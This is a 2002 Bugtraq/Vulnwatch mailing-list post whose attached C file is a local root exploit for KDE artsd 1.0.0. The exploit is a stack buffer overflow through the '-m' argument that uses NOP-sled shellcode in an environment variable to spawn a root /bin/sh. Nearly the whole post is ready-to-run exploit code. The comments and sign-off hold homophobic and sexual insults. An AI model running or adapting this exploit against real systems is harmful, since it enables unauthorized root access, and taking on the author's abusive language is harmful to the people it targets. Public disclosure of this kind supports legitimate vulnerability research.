KDE 2/3 artsd 1.0.0 local root exploit
Date: Mon, 29 Jul 2002 19:55:18 +0200
From: kokane <kokane@segfault.ch>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
Subject: KDE 2/3 artsd 1.0.0 local root exploit
------=_NextPart_000_000B_01C23739.DDFD1710
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
KDE 2/3 artsd 1.0.0 local root exploit PoC.
Cheers,
-kokane
------=_NextPart_000_000B_01C23739.DDFD1710
Content-Type: application/octet-stream;
name="bp_artsd.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="bp_artsd.c"
/* bp_artsd.c=0A=
* KDE 2/3 artsd 1.0.0 local root exploit=0A=
*=0A=
* credits: dvorak (helped me A LOT!@#), electronicsouls.org=0A=
*=0A=
* greets:=0A=
* bp members, dvorak, null, r00t, obz, rafa, nouse, module, phrack man, =0A=
* philer, preamble, eth1cal=0A=
* fucks to: fd0 (du schwule schlumpf)=0A=
*=0A=
* -kokane <kokane@segfault.ch>=0A=
*/=0A=
=0A=
#include <stdio.h>=0A=
#include <unistd.h>=0A=
#include <stdlib.h>=0A=
=0A=
#define BSIZE 1033=0A=
#define ESIZE 5120=0A=
#define RET 0xbffff808 /* tested on suse linux 8.0 */=0A=
=0A=
unsigned char buttcode[] =3D=0A=
"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80" // alarm(0);=0A=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);=0A=
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0);=0A=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"=0A=
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"=0A=
"\x80\xe8\xdc\xff\xff\xff/bin/sh";=0A=
=0A=
void anal(char *rets, char *evil) {=0A=
char * arg_[] =3D { "artsd", "-m", rets, 0 };=0A=
char * env_[] =3D { evil, 0 };=0A=
execve("/opt/kde3/bin/artsd", arg_, env_);=0A=
}=0A=
=0A=
int main(int argc, char **argv) {=0A=
char buf[BSIZE], egg[ESIZE];=0A=
unsigned long retaddr=3DRET;=0A=
int i;=0A=
=0A=
fprintf(stdout, "\n+ KDE 2/3 artsd 1.0.0 local root exploit =
(bp_artsd.c)\n+ by kokane/buttP!RATEZ\n");=0A=
=0A=
if (argc > 1)=0A=
retaddr =3D strtoul(argv[1], NULL, 0);=0A=
fprintf(stdout, "\n+ ret_addr: 0x%x\n\n", retaddr);=0A=
=0A=
/* fill our buffer with ret_addr's */=0A=
for (i =3D BSIZE-1 ; i >=3D 4 ; i =3D i-4)=0A=
*(unsigned long *)&buf[i - 4] =3D retaddr;=0A=
=0A=
/* fill our evil environment variable with nops + shellcode */=0A=
memset(egg, 0x90, sizeof(egg));=0A=
for (i =3D 0; i <=3D strlen(buttcode) ;i++)=0A=
egg[ESIZE - 1 - i] =3D buttcode[strlen(buttcode) - i];=0A=
memcpy(egg,"UNF=3D",4);=0A=
=0A=
buf[BSIZE - 1] =3D '\0';=0A=
egg[ESIZE - 1] =3D '\0';=0A=
=0A=
anal(buf, egg);=0A=
return 0;=0A=
}=0A=
/* buttP!RATEZ - providing k-rad anal sex since 2001 */=0A=
------=_NextPart_000_000B_01C23739.DDFD1710--
